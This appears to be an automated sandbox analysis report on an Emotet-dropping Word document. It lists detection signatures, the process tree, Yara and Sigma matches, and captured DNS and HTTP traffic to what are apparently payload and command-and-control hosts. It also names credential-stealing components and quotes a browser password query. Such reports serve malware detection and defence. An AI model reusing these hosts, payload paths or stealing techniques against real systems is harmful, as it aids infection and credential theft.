Analysis Report SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111 (renamed file extension from 9111 to doc)
Analysis ID: 255713
MD5: 84b4a3bdfd680dc3fde940f31a74dc97
SHA1: e0ca5c78044b5feee5e67dc4e74a7420d5705f05
SHA256: 501948f523c9bce4662fe102da5d632e953fccc2f521565eabc8f424297a4f1f

Most interesting Screenshot:

Detection

Emotet, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6740 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6888 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 545.exe (PID: 5592 cmdline: C:\Users\user\545.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
    • utildll.exe (PID: 5512 cmdline: C:\Windows\SysWOW64\winipcfile\utildll.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildll.exe (PID: 4528 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' 'C:\Users\user\AppData\Local\Temp\4836.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildll.exe (PID: 6092 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildll.exe (PID: 6112 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\516F.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildlloe.exe (PID: 6896 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildlloe.exe' 'C:\Users\user\AppData\Local\Temp\4836.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 4656 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6372 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6428 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6488 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6500 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20200802\PowerShell_transcript.639509.qla+rpjA.20200802002217.txt | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xfc9:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfc9:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfc9:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.639509.qla+rpjA.20200802002217.txt | JoeSecurity_EmotetDownloader | Yara detected Emotet Downloader | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.521515078.00000000032B0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000006.00000002.280422240.0000000002310000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(20 entries in total; only the first 5 are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.utildll.exe.32b0000.4.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.utildll.exe.32b0000.4.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.utildll.exe.3cd0000.8.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.utildll.exe.3b20000.7.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
19.2.utildll.exe.400000.0.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x131b0:$a1: logins.json
  • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x13934:$s4: \mozsqlite3.dll
  • 0x121a4:$s5: SMTP Password
(18 entries in total; only the first 5 are shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation
Source: Process started, Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update), Data: Command: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', CommandLine: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\winipcfile\utildll.exe, NewProcessName: C:\Windows\SysWOW64\winipcfile\utildll.exe, OriginalFileName: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentCommandLine: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentImage: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentProcessId: 5512, ProcessCommandLine: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', ProcessId: 6092

Signature Overview

Source: C:\Users\user\545.exe, Code function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,6_2_00444717
Source: C:\Users\user\545.exe, Code function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,6_2_004390BA
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, Code function: 7_2_00444717 lstrlenA,FindFirstFileA,FindClose,7_2_00444717
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, Code function: 7_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,7_2_004390BA
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, Code function: 18_2_0040A1A7 FindFirstFileW,FindNextFileW,18_2_0040A1A7
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, Code function: 18_1_0040A1A7 FindFirstFileW,FindNextFileW,18_1_0040A1A7
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: winword.exe, Memory has grown: Private usage: 0MB later: 65MB
Source: global traffic, DNS query: name: jkncrew.com
Source: global traffic, TCP traffic: 192.168.2.3:49740 -> 185.94.252.13:443
Source: global traffic, TCP traffic: 192.168.2.3:49723 -> 50.31.160.189:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 50.31.160.189:80 -> 192.168.2.3:49723
Source: Traffic, Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49740 -> 185.94.252.13:443
Source: global traffic, HTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1
    Host: jkncrew.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1
    Host: jmlandscapingservice.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/ HTTP/1.1
    Referer: http://185.94.252.13/JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/
    Content-Type: multipart/form-data; boundary=---------------------------303308476707525
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4596
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /uPWiBqbjc/bfNLb/n3e4xA4IL2qE8YZeH/AYUkbtjPwa3iFoOYi8/6jL14rWQuU/AL8Dgb/ HTTP/1.1
    Referer: http://185.94.252.13/uPWiBqbjc/bfNLb/n3e4xA4IL2qE8YZeH/AYUkbtjPwa3iFoOYi8/6jL14rWQuU/AL8Dgb/
    Content-Type: multipart/form-data; boundary=---------------------------802471010945937
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4596
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /PMx1be2sKY7dhiY1/dC97ETJ0RahEi6A8/NPnXAB/LY6ug5VG46Uk8OoBQa/luBTtDDM/ HTTP/1.1
    Referer: http://185.94.252.13/PMx1be2sKY7dhiY1/dC97ETJ0RahEi6A8/NPnXAB/LY6ug5VG46Uk8OoBQa/luBTtDDM/
    Content-Type: multipart/form-data; boundary=---------------------------727120016898053
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4596
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /4KiHd4GoeAQXach/KjEdPGt0vC/kIHvyhe2pRtlKS0s/RjHIcnY2eCuZJVkp5Q/HJxB0xobwYH37hSEIip/0aZH6cqpcvQi2/ HTTP/1.1
    Referer: http://185.94.252.13/4KiHd4GoeAQXach/KjEdPGt0vC/kIHvyhe2pRtlKS0s/RjHIcnY2eCuZJVkp5Q/HJxB0xobwYH37hSEIip/0aZH6cqpcvQi2/
    Content-Type: multipart/form-data; boundary=---------------------------177700964308477
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4596
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /ybxxSm0NduJr/21PWG/5BiKx/AWjhrrKjVVl5ac9/pcFlZM25RbM5MdjKnZ/ HTTP/1.1
    Referer: http://185.94.252.13/ybxxSm0NduJr/21PWG/5BiKx/AWjhrrKjVVl5ac9/pcFlZM25RbM5MdjKnZ/
    Content-Type: multipart/form-data; boundary=---------------------------826509774945116
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4612
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /6v6iac1tzc9jjbHG2/l1yGs2CoJVDYVFD0/ HTTP/1.1
    Referer: http://185.94.252.13/6v6iac1tzc9jjbHG2/l1yGs2CoJVDYVFD0/
    Content-Type: multipart/form-data; boundary=---------------------------403684127386855
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4612
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /Mf04o60zoJs/cAkWwU/0UIp9fAdSvEBJ/g9TH9Tt/F5Z0WoD/wjQA/ HTTP/1.1
    Referer: http://88.217.172.65/Mf04o60zoJs/cAkWwU/0UIp9fAdSvEBJ/g9TH9Tt/F5Z0WoD/wjQA/
    Content-Type: multipart/form-data; boundary=---------------------------147600063783432
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 88.217.172.65:443
    Content-Length: 4356
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 73.116.193.136 (reported 3 times)
Source: unknown, TCP traffic detected without corresponding DNS query: 185.94.252.13 (reported 47 times)
Source: utildll.exe, 00000012.00000002.377512445.0000000000B29000.00000004.00000040.sdmp, String found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.12917.8592.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: utildll.exe, 00000012.00000002.377512445.0000000000B29000.00000004.00000040.sdmp, String found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.12917.8592.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: utildll.exe, 00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp, utildll.exe, 00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: utildll.exe, 00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp, utildll.exe, 00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: utildll.exe, String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown, DNS traffic detected: queries for: jkncrew.com
Source: unknown, HTTP traffic detected: POST /JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/ HTTP/1.1
    Referer: http://185.94.252.13/JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/
    Content-Type: multipart/form-data; boundary=---------------------------303308476707525
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.94.252.13:443
    Content-Length: 4596
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: utildll.exe, 00000007.00000002.521164641.0000000002AB2000.00000004.00000001.sdmp, String found